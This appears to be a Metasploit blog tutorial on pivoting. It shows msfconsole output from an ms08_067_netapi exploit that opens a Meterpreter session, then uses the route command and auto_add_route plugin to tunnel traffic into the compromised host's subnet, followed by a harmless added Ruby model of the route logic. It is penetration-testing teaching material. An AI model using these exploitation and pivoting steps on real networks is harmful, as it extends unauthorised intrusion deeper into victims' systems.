Automatic Routing Through New Subnets

Among the coolest features in Metasploit is the ability to tunnel through a Meterpreter session to the network on the other side of the compromised host. The route command in msfconsole sets this up, but it requires a bit of experience to get right.


[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1238)

meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1

msf exploit(ms08_067_netapi) >

After running the above commands, any traffic that Metasploit modules send to the 10.1.1.0/24 network will be tunnelled through session 1. There is also a plugin that automatically adds a route for any previously unseen subnet reported by a new session when it opens. Here is some example usage and output:


msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.1.1.52:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1

msf exploit(ms08_067_netapi) >

The auto_add_route plugin is now available in the metasploit trunk; ‘svn up’ to get it.
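To make the "previously unseen" decision concrete, here is an added Ruby model of that logic (example code written for this page, not the auto_add_route plugin's own source). The RouteTable class, its method names and the sample get_local_subnets lines are assumptions; it parses the "Local subnet: addr/mask" format shown above, normalises each address to its network so that a host address and its network address are treated as the same subnet, and records a route only the first time a subnet appears.

```ruby
require 'ipaddr'

# Hypothetical model of the auto-add-route decision (added example, not the
# Metasploit plugin's code). Routes are keyed by network/netmask so the same
# subnet reported by several sessions is only routed once.
class RouteTable
  Route = Struct.new(:subnet, :netmask, :session)

  def initialize
    @routes = []
  end

  # Parse lines in the form printed by get_local_subnets:
  #   "Local subnet: 10.1.1.0/255.255.255.0"
  # Returns [address, netmask] string pairs; unrelated lines are ignored.
  def self.parse_local_subnets(output)
    output.each_line.filter_map do |line|
      m = line.match(%r{Local subnet:\s*(\d+\.\d+\.\d+\.\d+)/(\d+\.\d+\.\d+\.\d+)})
      m && [m[1], m[2]]
    end
  end

  # Apply the netmask so 10.1.1.52/255.255.255.0 and 10.1.1.0/255.255.255.0
  # both map to the network address 10.1.1.0.
  def self.network_of(addr, netmask)
    IPAddr.new(addr).mask(netmask).to_s
  end

  # True when a route for this network/netmask pair already exists.
  def known?(addr, netmask)
    net = self.class.network_of(addr, netmask)
    @routes.any? { |r| r.subnet == net && r.netmask == netmask }
  end

  # Add a route for every subnet in +output+ that is not yet routed,
  # attributing it to +session_id+. Returns only the routes that were added.
  def add_unseen(output, session_id)
    self.class.parse_local_subnets(output).filter_map do |addr, netmask|
      next if known?(addr, netmask)
      route = Route.new(self.class.network_of(addr, netmask), netmask, session_id)
      @routes << route
      route
    end
  end

  def routes
    @routes.dup
  end

  # Render the table in the style of msfconsole's "route print".
  def to_s
    lines = ['Subnet Netmask Gateway', '------ ------- -------']
    @routes.each { |r| lines << "#{r.subnet} #{r.netmask} Session #{r.session}" }
    lines.join("\n")
  end
end

# Constructed sample input in the get_local_subnets format from the post above.
if __FILE__ == $PROGRAM_NAME
  table = RouteTable.new
  table.add_unseen("Local subnet: 10.1.1.0/255.255.255.0\n", 1)
  # A second session on the same subnet adds nothing; a new subnet is routed.
  table.add_unseen("Local subnet: 10.1.1.52/255.255.255.0\nLocal subnet: 192.168.5.0/255.255.255.0\n", 2)
  puts table
end
```

The normalisation step matters: get_local_subnets reports the subnet already masked, but if a session ever reported a host address instead, comparing raw strings would add a duplicate route for the same network.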

Source: Metasploit Blog
